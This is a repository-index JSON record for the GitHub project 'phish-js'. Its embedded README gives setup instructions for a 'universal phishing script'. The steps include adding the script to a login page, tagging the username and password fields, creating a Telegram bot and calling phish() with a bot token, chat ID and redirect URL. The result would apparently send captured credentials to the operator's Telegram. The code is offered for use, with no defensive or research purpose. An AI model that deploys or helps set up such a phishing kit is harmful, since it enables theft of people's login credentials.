{"id":20084007,"url":"https://github.com/xbaysal11/phish-js","last_synced_at":"2025-05-06T01:31:40.535Z","repository":{"id":99754058,"uuid":"242698347","full_name":"xbaysal11/phish-js","owner":"xbaysal11","description":":tropical_fish: Phish JS - Universal phishing script with Telegram bot notification ","archived":false,"fork":false,"pushed_at":"2023-07-03T04:57:52.000Z","size":11,"stargazers_count":52,"open_issues_count":3,"forks_count":19,"subscribers_count":3,"default_branch":"master","last_synced_at":"2025-04-09T06:35:07.039Z","etag":null,"topics":["facebook","fish","fishjs","git","hack","hacking","instagram","js","phishing","phishing-attacks","phishing-pages","phishing-script","phishing-sites","phishjs","script","telegram","telegram-bot","telegram-bot-api"],"latest_commit_sha":null,"homepage":"https://xbaysal11.github.io/phish-js/","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/xbaysal11.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-02-24T09:44:18.000Z","updated_at":"2025-03-13T13:09:46.000Z","dependencies_parsed_at":null,"dependency_job_id":"c82d13a2-1826-4c2b-beeb-f1f1ed8f149a","html_url":"https://github.com/xbaysal11/phish-js","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/xbaysal11%2Fphish-js","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/xbaysal11%2Fphish-js/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/xbaysal11%2Fphish-js/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/xbaysal11%2Fphish-js/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/xbaysal11","download_url":"https://codeload.github.com/xbaysal11/phish-js/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":252604319,"owners_count":21775082,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["facebook","fish","fishjs","git","hack","hacking","instagram","js","phishing","phishing-attacks","phishing-pages","phishing-script","phishing-sites","phishjs","script","telegram","telegram-bot","telegram-bot-api"],"created_at":"2024-11-13T15:49:52.373Z","updated_at":"2025-05-06T01:31:40.522Z","avatar_url":"https://github.com/xbaysal11.png","language":"JavaScript","funding_links":[],"categories":[],"sub_categories":[],"readme":"\u003cp align=\"center\"\u003e\n    \u003cimg src=\"https://i.postimg.cc/NG8KJWZ1/external-content-duckduckgo-com.png\" alt=\"logo\" width=\"154\" height=\"154\"\u003e\n\u003c/p\u003e\n\n\u003ch2 align=\"center\"\u003ePhish JS\u003c/h2\u003e\n\n\u003cp align=\"center\"\u003e\n     Universal phishing script + Telegram bot notification\n\u003c/p\u003e\n\n[![Privatium](https://img.shields.io/github/license/xbaysal11/privatium)](https://github.com/xbaysal11/phish-js)\n[![Github](https://img.shields.io/github/followers/xbaysal11?style=social)](https://github.com/xbaysal11)\n[![Privatium](https://img.shields.io/github/stars/xbaysal11/phish-js?style=social)](https://github.com/xbaysal11/phish-js)\n\n---\n\n# Documentation\n\n## 1. Download files or clone\n  - [Download files](https://github.com/xbaysal11/phish-js/archive/master.zip).\n\n## 2. Put \"phish.min.js\" file to your project\n\n## 3. Import \"phish.min.js\"\n```\n\u003cscript src=\"phish.min.js\"\u003e\u003c/script\u003e\n```\n\n## 4. Import \"JQuery\"\nVia [CDN](https://code.jquery.com/)  is the quickest and easiest way to get JQuery on your website.\n\n```\n\u003cscript src=\"https://code.jquery.com/jquery-3.4.1.slim.min.js\" integrity=\"sha256-pasqAKBDmFT4eHoN2ndd6lN370kFiGUFyTiUHWhU7k8=\" crossorigin=\"anonymous\"\u003e\u003c/script\u003e\n```\n\n## 5. Set ids to inputs and button\n\n```\n\u003cinput type=\"text\" id='username'\u003e\n\u003cinput type=\"password\" id='password'\u003e\n\n\u003cbutton type=\"button\" id='submit-button'\u003eLogin\u003c/button\u003e\n```\n\n## 6. Get TOKEN and CHAT_ID\n\n - 1. Create bot with `@BotFather` and copy bot TOKEN\n - 2. Open your bot and type `/start` \n - 3. Get chat id here:  `https://api.telegram.org/bot\u003cTOKEN\u003e/getUpdates`\n\n## 7. Call function\n\n```\n\u003cscript\u003e\n    $(document).ready(function () {\n        const BOT_TOKEN = 'your_bot_token',\n            CHAT_ID = 'your_chat_id',\n            REDIRECT_URL = 'default_redirect_url'\n        phish(BOT_TOKEN, CHAT_ID, REDIRECT_URL);\n    });\n\u003c/script\u003e\n```\n\n---\n\n### LICENSE\n\nPhish JS is [MIT licensed.](https://github.com/xbaysal11/phish-js/blob/master/LICENSE)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fxbaysal11%2Fphish-js","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fxbaysal11%2Fphish-js","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fxbaysal11%2Fphish-js/lists"}